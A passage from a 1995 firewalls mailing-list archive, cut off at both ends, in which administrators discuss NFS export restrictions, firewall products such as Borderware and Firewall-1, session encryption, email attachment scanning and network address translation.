-0500 Received: from worldcom-45.worldcom.com(198.64.193.76) by safety.worldcom.com via smap (V1.3) id sma012773; Tue Oct 3 13:21:18 1995 Received: by worldcom-45.worldcom.com (IBM OS/2 SENDMAIL VERSION 1.3.14/3.3) id AA3202; Tue, 03 Oct 95 13:22:13 -0400 Message-Id: <9510031722.AA3202@worldcom-45.worldcom.com> Received: from worldcom with "Lotus Notes Mail Gateway for SMTP" id C066A24E339FBE7C8625624A0064BF9C; Tue, 3 Oct 95 13:22:13 To: firewalls From: Joseph Urban Date: 3 Oct 95 14:12:00 Subject: -No Subject- Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sunscribe firewalls-digest From firewalls-owner Tue Oct 3 12:01:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18961 for firewalls-outgoing; Tue, 3 Oct 1995 11:47:46 -0700 Received: from gate.vegas.com (gate.vegas.com [199.182.236.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA18954 for ; Tue, 3 Oct 1995 11:47:43 -0700 From: oddboy@vegas.com Received: by gate.vegas.com (5.x/SMI-SVR4) id AA13775; Tue, 3 Oct 1995 11:42:44 -0700 Date: Tue, 3 Oct 1995 11:42:44 -0700 Message-Id: <9510031842.AA13775@gate.vegas.com> To: firewalls@greatcircle.com Subject: IRC X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I find myself in the position of having to put up a private IRC server (private being not connected to either Undernet or Efnet). Basically this is to allow "chat" forums for a few of my clients. I would like to make these chat lines live outside of my firewall (and plan on it) nut am curious what I should watch out for in terms of folks being able to hack through and into an OS. (i run solaris2.4 but I think the IRC server will run on a DEC box running OSF/DecUnix. Any and all info will be greatly appreciated. Gideon Wober Systems Administrator Digitainment Corporation From firewalls-owner Tue Oct 3 12:24:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19895 for firewalls-outgoing; Tue, 3 Oct 1995 12:10:53 -0700 Received: from Heuristicrat.COM (Heuristicrat.COM [199.171.120.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA19888 for ; Tue, 3 Oct 1995 12:10:50 -0700 Received: (smap@localhost) by Heuristicrat.COM (8.6.11/8.6.5) id MAA06269; Tue, 3 Oct 1995 12:09:21 -0700 Received: from euclid.heuristicrat.com(199.171.121.3) by Heuristicrat.COM via smap (V1.3) id sma006267; Tue Oct 3 12:09:17 1995 Received: from shattuck.Heuristicrat.COM by euclid.Heuristicrat.COM (4.1/Othar) id AA16654; Tue, 3 Oct 95 12:09:16 PDT Date: Tue, 3 Oct 95 12:09:16 PDT From: jordan@Heuristicrat.COM (Jordan M. Hayes) Message-Id: <9510031909.AA16654@euclid.Heuristicrat.COM> To: firewalls@GreatCircle.COM Subject: FLEXlm with proxy ...? Cc: fwtk-users@TIS.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone built a FLEXlm proxy for FWTK? /jordan From firewalls-owner Tue Oct 3 12:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20009 for firewalls-outgoing; Tue, 3 Oct 1995 12:12:42 -0700 Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA19984 for ; Tue, 3 Oct 1995 12:12:33 -0700 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id NAA26615; Tue, 3 Oct 1995 13:43:00 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id NAA15266; Tue, 3 Oct 1995 13:42:56 -0500 Date: Tue, 3 Oct 1995 13:42:56 -0500 Subject: Re: NFS To: reg@dwf.com Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <199510030811.CAA03698@clemens.dwf.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I am sure that this topic has been beaten to death, so if someone would >just point me at the discussion (or tell me that there is no solution) >I would be happy to take it from there. I remember reading a paper a >couple years ago describing why NFS could never be made secure, but for >the life of me I cant seem to find it now. > >The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half >dozen file systems that are exported read-only to all the other machines >in the domain. I would like to restrict their mounting to machines within >the domain while maintaining connectivity to the outside world. >SUN's software does not support this option, it only allows specifying >specific machine names, and the list of *all* machine names overflows >some internal limit in SUN's software. > >[ The machine uses DNS and not YP, it is rumored that possibly with YP one >can get by this limit, but I have no interest in adding YP to my list of >problems. ] > >So, the Questions > > (1) WITHOUT resorting to a firewall, is there any way to accomplish >what I want to do? > > (2) If not, can it be done with a `simple' packet filter, or does it >require a full blown firewall? > > > Reg.Clemens > clemens@dwf.com > > > Without necessary resorting to a firewall, you can have your router to the outside world block: port 2049/udp - NFS port 111 udp/tcp - Sun RPC source routed packets outside packets with internal IP source addresses (IP spoofing) This helps prevent a great deal of the most common attacks on NFS by preventing it getting outside your domain at the interface to the Internet. also, installing the replacement tcp_wrappered version of portmap on your NFS servers from ftp.win.tue.nl is also a good thing to do. This way you can limit what networks are able to send RPC requests to your server. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that" From firewalls-owner Tue Oct 3 14:21:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23435 for firewalls-outgoing; Tue, 3 Oct 1995 13:47:43 -0700 Received: from ns.via.net (ns.via.net [140.174.204.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23422 for ; Tue, 3 Oct 1995 13:47:38 -0700 Received: (from joe@localhost) by ns.via.net (8.6.9/8.6.9) id NAA07589 for firewalls@GreatCircle.COM; Tue, 3 Oct 1995 13:46:08 -0700 Date: Tue, 3 Oct 1995 13:46:08 -0700 From: Joe McGuckin Message-Id: <199510032046.NAA07589@ns.via.net> To: firewalls@GreatCircle.COM Subject: Need Windows FTP client source Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need a windows FTP client that can do SNK authentication. I want to use it with the FWTK ftp-gw proxy. The problem is that most of the gui based windows FTP clients don't have a command line or a logging window to view status messages, etc. Any suggestions? -joe From firewalls-owner Tue Oct 3 14:21:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA23387 for firewalls-outgoing; Tue, 3 Oct 1995 13:45:58 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA23371 for ; Tue, 3 Oct 1995 13:45:43 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id PAA17754; Tue, 3 Oct 1995 15:46:35 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 091390000; 3 Oct 95 16:44 CDT Received: from sctc.com by sccmailhost.sctc.com id 276510000; 3 Oct 95 16:43 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA01419; Tue, 3 Oct 1995 15:43:28 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA11874; Tue, 3 Oct 1995 15:43:26 -0500 Date: Tue, 3 Oct 1995 15:43:26 -0500 From: Rick Smith Message-Id: <199510032043.PAA11874@shade.sctc.com> To: firewalls@greatcircle.com Cc: glenn@border.com, smith@sctc.com Subject: Borderware (was: Information, We want information) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Glenn Mackintosh writes: >This is the second time I've heard rumors about insecurities in the >BorderWare software with nothing being brought out to substantiate them. I >guess this is just an unfortunate part of doing business - especially in the >security domain. I get a bit annoyed by this kind of thing since, >regardless of whether we refute such comments, after the discussion itself >is forgotten people will often remember that they heard something about a >problem with product X. The Internet giveth just as it taketh away -- people post unsubstantiated rumors as quickly as any of us can post denials. Now, to a technical question: >.... That said, Border doesn't use a stock BSD based OS anyway. We >have put a large amount of effort into "hardening" the kernel so that it is >a solid base upon which to build a secure firewall. ... [snip] .... >We spent a considerable amount of manpower stripping down the kernel and >leaving only what was really needed. We removed the mechanisms which can be >used to gain privilege or increase the levels of access to the system. So, the "hardening" of the Borderware kernel consists primarily of eliminating unnecessary portions of the BSD kernel, correct? This is not intended as a "leading question" from a competitor, just an attempt to clearly understand what Borderware has done. Rick. smith@sctc.com secure computing corporation From firewalls-owner Tue Oct 3 15:52:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA27309 for firewalls-outgoing; Tue, 3 Oct 1995 15:38:44 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA27302 for ; Tue, 3 Oct 1995 15:38:40 -0700 Received: from pm3-17.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA29112; Tue, 3 Oct 95 17:35:21 -0400 Date: Tue, 3 Oct 95 17:35:21 -0400 Message-Id: <9510032135.AA29112@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Encryption strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From padgett's excellent mail: >Further, key management is a perenniel problem. "How is that first secure >link established ?" is a chicken and the egg kind of problem. Today out-of- >channel is the most popular answer as demonstrated by Netscape but is either >a logistical nightmare or potential weakness. (It might be cheaper to buy >ViaSign than to break their certificates). Actually, the key management problem was solved by V-ONE a couple of years ago. (V-ONE is a firewall vendor). After the host & the firewall have mutually authenticated themselves to each other (to prevent node spoofing), the entire session is encrypted - with each session having a *different* (unique) encryption key. Individual files can also be encrypted using user-friendly "drag & drop" encryption - with the encrypted file having a *different* key than is used to encrypt the link between the user & the firewall. (The above applies to firewall-to-firewall communications also). BTW, the end-to-end encryption should put an end to the "terminal session hijacking". Eventually, other firewalls will incorporate similar technologies. Any firewall manufacturer that intends to stay in the field for the long run will have to incorporate extensive authentication & encryption mechanisms - just to stay in business. >For all of that, I believe that good encryption will be the element that >begins to make our jobs easier, both via creation of secure links between >Firewalls/Enterprises and through double wrapping at the application level. I couldn't agree more. > Warmly, > Padgett Best Regards, Frank From firewalls-owner Tue Oct 3 16:23:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA28611 for firewalls-outgoing; Tue, 3 Oct 1995 16:05:44 -0700 Received: from folio.com (smtpgate.folio.com [198.60.24.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA28604 for ; Tue, 3 Oct 1995 16:05:41 -0700 From: RTATE@folio.com Received: from FOLIO_PRIMARY_DOMAIN-Message_Server by folio.com with WordPerfect_Office; Tue, 03 Oct 1995 17:07:44 -0600 Message-Id: X-Mailer: WordPerfect Office 4.0 Date: Tue, 03 Oct 1995 17:05:45 -0600 To: firewalls@greatcircle.com Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ** Low Priority ** I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? Thanks in advance for responses!! Please reply to: rtate@folio.com Robert Tate Sr. Network Technician Folio Corporation Thanks robert From firewalls-owner Tue Oct 3 18:23:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA02534 for firewalls-outgoing; Tue, 3 Oct 1995 18:07:13 -0700 Received: from vision.postech.ac.kr (vision.postech.ac.kr [141.223.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA02527 for ; Tue, 3 Oct 1995 18:06:57 -0700 Received: (from rhee@localhost) by vision.postech.ac.kr (8.6.12H1/8.6.12) id KAA17605; Wed, 4 Oct 1995 10:01:04 +0900 From: Snow-Flower Message-Id: <199510040101.KAA17605@vision.postech.ac.kr> Subject: Exact format for subscribing the info security list. To: Firewalls@GreatCircle.COM Date: Wed, 4 Oct 1995 10:01:03 +0900 (JST) Cc: rhee@vision.postech.ac.kr (Flower) X-Mailer: ELM [version 2.4 PL21-h4] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-2022-kr Content-Transfer-Encoding: 7bit Content-Length: 1029 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, sir. I like to know what is the exact format for subscribing the info security list. I've tried to send subscription message to LISTSERV@ETSUADMN.ETSU.EDU serveral times I failed. Message body was ......... subscribe Young Rhee Please let me know . Thanks in advance. rhee@vision.postech.ac.kr o----o----o-----o----o----o----o----o----o----o----o----o----o----o----o----o Young Rhee (Snow-Flower) Computer Center * Pohang Institute of Science and Technology | P.O.Box 125 | Pohang,Kyungbuk 790-600 x E-mail : rhee@vision.postech.ac.kr xxx Phone : +82-0562-279-2529 xxxxxxx Fax : +82-0562-279-2599 xxxxxxxxxxxxxxx o----o----o----o----o----o----o----o----o----o----o-----o-----o----o----o----o From firewalls-owner Tue Oct 3 19:22:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03616 for firewalls-outgoing; Tue, 3 Oct 1995 19:12:29 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03609 for ; Tue, 3 Oct 1995 19:12:25 -0700 Date: Tue, 3 Oct 1995 22:10:58 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951003221058.21058735@hobbes.orl.mmc.com> Subject: re: Encryption strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank rites: >Actually, the key management problem was solved by V-ONE a couple of years >ago. (V-ONE is a firewall vendor). >After the host & the firewall have mutually authenticated themselves to each >other (to prevent node spoofing), the entire session is encrypted - with each >session having a *different* (unique) encryption key. Sounds wonderful but pray tell *how* do they authenticate each other ? Out- of-channel ? Nice thing about the Netscape reversal of the traditional mechanism is that a secure channel is created *before* any trust is exchanged. Given that, traditional means of authentication are possible without worry of sniffing. Spoofing yes, but not sniffing and us aunchient mainframers know how to handle spoofing 8*). Warmly, Padgett ps had an interesting conversation with the NSA today in which I was told that it is OK to explain why the right side of a KW-26 card case has all them little dents - of course you will have to be shot afterwards... From firewalls-owner Tue Oct 3 19:52:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03859 for firewalls-outgoing; Tue, 3 Oct 1995 19:33:01 -0700 Received: from aurora.cdev.com (aurorax.cdev.com [160.207.114.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03852 for ; Tue, 3 Oct 1995 19:32:57 -0700 Message-Id: <199510040232.TAA03852@miles.greatcircle.com> Received: from cdicisco8.cdev.com by aurora.cdev.com id SMTP-0013071f24d019269; Tue, 3 Oct 95 21:32:48 -0500 X-Sender: djs3wn39@aurora.cdev.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 03 Oct 1995 18:19:14 -0700 To: firewalls-digest@GreatCircle.COM From: Donald.J.Smith@.cdev.com (Donald J Smith) Subject: re re nfs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: David Brownlee >Date: Tue, 3 Oct 1995 10:55:04 +0100 (BST) >Subject: Re: NFS > >On Tue, 3 Oct 1995, Reg Clemens wrote: > >> [...] >> >> The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half >> dozen file systems that are exported read-only to all the other machines >> in the domain. I would like to restrict their mounting to machines within >> the domain while maintaining connectivity to the outside world. >> SUN's software does not support this option, it only allows specifying >> specific machine names, and the list of *all* machine names overflows >> some internal limit in SUN's software. >> >> [...] > > Replace the innetgr.c in libc.so with a non broken version. > (I have a non broken version I can mail on request) > I did that here & hapilly exported to ~200 machines (with FQDN) from > SunOS 4.1.3 & 4.1.4. More recently I've replaced SunOS with NetBSD > which gets it right without any help (And has a _much_ better > /etc/exports syntax - I can export to 138.40.X.X easily, and map all > uids (not just root) to a given uid & other nice things too). > > > David/abs > > D.K.Brownlee@city.ac.uk (MIME) +44 171 477 8186 {post,host}master (abs) >Network Analyst, UCS, City University, Northampton Square, London EC1V 0HB. > <<< Monochrome - Largest UK Internet BBS - telnet mono.org >>> >>=- Microsoft: Abort and Retry Cancel -or- NetBSD: http://www.netbsd.org -=< > > >----- You can also chain netgroups, but without that firewall (that as a minimum prevents spoofing internal ip addressed) it is all for naught. Some comes in as a legal address and your hole (yes that is spelled correctly) is shot. Donald J Smith Network Security Engineer @Computing Devices International "@begin design in the security and ease_of_use != A*(1/Data_Security)" (my opinions are mine and so are the spelling errors ;-) From firewalls-owner Tue Oct 3 20:00:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03893 for firewalls-outgoing; Tue, 3 Oct 1995 19:34:41 -0700 Received: from gw2.att.com (gw2.att.com [192.20.239.134]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03886 for ; Tue, 3 Oct 1995 19:34:38 -0700 Received: from vodka.sse.att.com by ig1.att.att.com id AA13463; Tue, 3 Oct 95 08:52:59 EDT Message-Id: <9510031252.AA13463@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Mail Proxy To: long-morrow@CS.YALE.EDU Date: Tue, 3 Oct 1995 08:54:35 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199510021459.KAA26661@SPARKY.CF.CS.YALE.EDU> from "long-morrow@CS.YALE.EDU" at Oct 2, 95 10:59:08 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We've gone around this circle at least once before. Coming up to two conclusions. 1) it is *impossible* to prevent a determined individual from transferring executables via email. (But you can slow them down) 2) The vast majority of such transfers *can* be prevented by an automated program scanning for the most common forms of encoding. Also, it is possible to virus scan the binaries that have been detected. However, general consensus is that such scanning is ineffective because it only cover one channel of binaries to the PC, (Floppy disks are another). Virus scanning must be done at the PC. However, I must admit that I'd be interested in a Word document macro virus scanner :) These "executable content" vira are an interesting breed. Mark Riggins Secure Systems Engineering AT&T Bell Labs > > Chris Tyler wrote: > > > >Slava Kritov writes: > > > >> Any uuencode ? > >> Sorry, as a sysadm of 500+ orgs can say, that people sometimes exchange > >> word docs in uuencode, and ( for Mac's ) you can't even say its word doc > >> based on name ... > > > >Right... so? The purpose was to deny all attachments, whether word DOCs or executables. So > >you look for the uuencode signature string and deny. > > But by only looking for the 'signature's of known binary encoding formats > you then open yourself up for people to create their own encoding formats > to get around your scan for, and restriction on encoded message enclosures. > > 3 possibilities for getting around a scan for known encoding signatures : > > 1. rot13 a uuencoded file before e-mailing it. Describe in the message > how to unrot13 the message before uudecoding it. > > 2. Use an (admittedly) inefficient format for encoding binary, such as: > > RAVE AFRO STUB DAM HONE HAY > CLAD WILL JOIN PET LONG WEED > ... > > The recipient will need a decoder of course. > > 3. PGP encrypt the entire message before transmitting. How will the > mail scanner know what is inside the message? Are you going to > reject all encrypted messages? I think that encrypted messages > will increasingly become the norm on the Internet as PC based > mail programs incorporate automatic easy-to-use PGP encryption. > > > - Morrow > > From firewalls-owner Tue Oct 3 21:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA05431 for firewalls-outgoing; Tue, 3 Oct 1995 20:52:03 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA05424 for ; Tue, 3 Oct 1995 20:52:00 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id WAA09928 for GreatCircle.COM!firewalls; Tue, 3 Oct 1995 22:33:46 -0500 Received: by ris1.nmti.com (smail2.5) id AA18501; 3 Oct 95 19:37:40 CDT (Tue) Received: by sonic.nmti.com; id AA11758; Tue, 3 Oct 1995 20:04:29 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9510040104.AA11758@sonic.nmti.com.nmti.com> Subject: Re: FW to FW FTP w/ no port > 1023 To: sgcccdc@citec.qld.gov.au (Colin Campbell) Date: Tue, 3 Oct 1995 20:04:28 -0500 (CDT) Cc: wbunting@ch.inri.com, firewalls@GreatCircle.COM In-Reply-To: <9510022336.AA14998@citecub.citec.qld.gov.au> from "Colin Campbell" at Oct 3, 95 09:36:16 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 341 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > 3. Do not use FTP and write a TCP application that uses only a single TCP > > port for data and control. Issues: Time + $$ no compatibility. Benefit: > > solves the problem. FSP and HTTP are both candidates for this application. And they've already been written. NNTP would work as well, and can be proxied with a simple plug gateway. From firewalls-owner Tue Oct 3 21:22:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA05669 for firewalls-outgoing; Tue, 3 Oct 1995 21:09:18 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA05662 for ; Tue, 3 Oct 1995 21:09:14 -0700 Received: from pm2-11.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA12903; Tue, 3 Oct 95 23:06:00 -0400 Date: Tue, 3 Oct 95 23:06:00 -0400 Message-Id: <9510040306.AA12903@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: re: Encryption strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the desk of Padgett: >Frank rites: >>Actually, the key management problem was solved by V-ONE a couple of years >>ago. (V-ONE is a firewall vendor). > >>After the host & the firewall have mutually authenticated themselves to each >>other (to prevent node spoofing), the entire session is encrypted - with each >>session having a *different* (unique) encryption key. > >Sounds wonderful but pray tell *how* do they authenticate each other ? Out- >of-channel ? Nice thing about the Netscape reversal of the traditional >mechanism is that a secure channel is created *before* any trust is exchanged. >Given that, traditional means of authentication are possible without worry >of sniffing. Spoofing yes, but not sniffing and us aunchient mainframers know >how to handle spoofing 8*). Would it suffice to say that it was good enough for NSA - and that it is the *only* Internet firewall used in a NSA-approved configuration? In a public forum, this is probably all I can say. > Warmly, > Padgett > >ps had an interesting conversation with the NSA today in which I was told that > it is OK to explain why the right side of a KW-26 card case has all them > little dents - of course you will have to be shot afterwards... You might also ask your contacts at the Puzzle Palace about how V-ONE does mutual authentication. Best Regards, Frank From firewalls-owner Wed Oct 4 00:32:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA07878 for firewalls-outgoing; Wed, 4 Oct 1995 00:28:09 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA07871 for ; Wed, 4 Oct 1995 00:28:06 -0700 Received: by gw.home.vix.com id AA28489; Wed, 4 Oct 95 00:26:39 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA26556; Wed, 4 Oct 1995 00:26:39 -0700 Message-Id: <9510040726.AA26556@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: re: network address translation Date: Wed, 04 Oct 1995 00:26:39 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was forwarded this by a friend and asked to respond to it publically. I am not on the firewalls mailing list, so CC me on your reply if any. >Frank Senter, Senior Information Specialist >Missouri Highway and Transportation Department >P.O. Box 270, Jefferson City MO 65102 ...wrote: >I've heard there are a couple of commercial network address translators >available for those of us who were foolish enough to build extensive >enterprise networks on non-NIC assigned addresses. Does anyone have any >real-world experience with such a product? I have heard that IBM sells a commercial product that can do this. I don't have any experience with it, and in fact I have never heard from a non-IBM user of it so I have no idea how well it works. At Usenix LISA a few weeks ago in Monterey, CA, the first booth inside the front door belonged to a company that sold NAT boxes. They appeared to be based on some BSD flavour, and they wanted to sell hardware rather than just a software solution. Now if I could only remember their company name. Ah, here it is in the vendor directory included with my conference materials: Border Network Technologies; Borderware Firewall Server; . Last but not least, I took a stab at this a while ago but I did all the magic in the application gateway process address space; this means the proxy gateway is something akin to SOCKS but with a more robust protocol, listeners, round robin'ed incoming/outgoing connections for performance and redundancy, and most important, little or no source code modifications (I replace system calls with library calls that have wider semantics.) I'll be giving a talk about this at the Network Security '95 ("SANS") conference; . My software will be available and freely redistributable shortly after I present my paper. >Is it possible to kludge such a product together on a commercial firewall? That depends. If you chose a network that RFC 1597 set aside for private networks, or you know that you will never want to exchange packets with whoever holds the real delegation for the network you are using, then yes, you can kludge this together out of standard components. If on the other hand you are dealing with an "ambiguous prefix" where your border will have to disambiguate two networks (one inside, one outside) with the same prefix, then you need something stronger or you need a lot of intermediate moat nets. >And lastly, is the cost/effort of implementing such a product <= effort of >renumbering 2k hosts? I renumbered 2K hosts in four days with only one person helping me. But we were in an engineering environment and the production component was pretty small; also, we had root access on virtually all of the 2K hosts. If your hosts are all over the country and owned/run by different administrations, or if your production machines aren't easily corraled, or if your users are not engineers (and thus, not understanding of _your_ problems), then I suspect that the time taken to plan and implement a "safe" renumbering of your 2K hosts is as large or larger than the time it will take to build or install a disambiguating firewall. If you do renumber, I recommend that you renumber into an RFC 1597 prefix and use some kind of NAT solution or moat-based firewall with application gateways. This will make it possible for you to multi-home your net -- all you will have to do is get additional outside connections to the NAT or firewall, since each of your providers will only see the one little segment of the network that they want you to live on. The fact that you've got 2K hosts needn't trouble them -- in fact they need not even be aware of it. This will give you the added flexibility of being able to dump your provider and move to their competitor without fighting over the ownership of your prefix, or paying the renumbering cost every time you switch. I guess you can tell that I think RFC 1597 is a good thing. Hope this helps. Paul Vixie La Honda, CA "Illegitimi non carborundum." pacbell!vixie!paul (dont let the bastards grind you down) From firewalls-owner Wed Oct 4 02:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA09681 for firewalls-outgoing; Wed, 4 Oct 1995 01:51:46 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA09674 for ; Wed, 4 Oct 1995 01:51:40 -0700 Received: from juts.ccc.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0t0PWm-0001Z4C; Wed, 4 Oct 95 01:50 PDT Received: by juts.ccc.amdahl.com (/\../\ Smail3.1.14.4 #14.6) id ; Wed, 4 Oct 95 01:50 PDT Date: Wed, 4 Oct 95 09:42:42 PDT From: Luc Vanderschelde Subject: RE: Borderware vs. Firewall-1 To: RTATE@folio.com Cc: firewalls@greatcircle.com X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robert, deciding on what package is the best can only be done in function of the security policy you want to apply. So, I can not tell you if there is a better package somewhere. If you like a firewall comparison of the products Firewall_1, Raptor Eagle, Black Hole, DEC SEAL, Janus, TIS Gauntlet, then contact info@milkyway.com Note that Milkyway Networks (Ontario, Canada) is the developer of Black Hole, so the comparison mught be somewhat "coloured". Their web server is at http://www.milkyway.com Have fun, Luc ----------------------------------------------------- Name: Luc Vanderschelde Company: AMDAHL Belgium NV/SA Department: Business Solutions Group Function: Consultant E-mail: lzv10@juts.ccc.amdahl.com (Luc Vanderschelde) Date: 06/15/95 Time: 17:32:08 ----------------------------------------------------- ---------------Included Message--------------- To: firewalls@greatcircle.com Subject: Borderware vs. Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ** Low Priority ** I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? Thanks in advance for responses!! Please reply to: rtate@folio.com Robert Tate Sr. Network Technician Folio Corporation Thanks robert From firewalls-owner Wed Oct 4 05:24:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA12523 for firewalls-outgoing; Wed, 4 Oct 1995 05:10:42 -0700 Received: from E-MAIL.COM (e-mail.com [199.171.26.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA12516 for ; Wed, 4 Oct 1995 05:10:39 -0700 Message-Id: <199510041210.FAA12516@miles.greatcircle.com> Received: from cem-bb.e-mail.com by E-MAIL.COM (IBM VM SMTP V2R2) with BSMTP id 1925; Wed, 04 Oct 95 08:08:38 EDT Date: Wed, 04 Oct 1995 08:12:27 EDT From: toon@cem-bb.e-mail.com To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm always happy when I find overview lists of products or even comparisons between products. So I asked RPower@MFI.COM already for the '1995 Internet security survey' and I hope I will get it soon. So, I liked the response from Luc Vanderschelde (AMDAHL) to Robert Tate including a list of products and a reference to a comparison. However the IBM product NetSP Gateway was not in the list. Maybe he 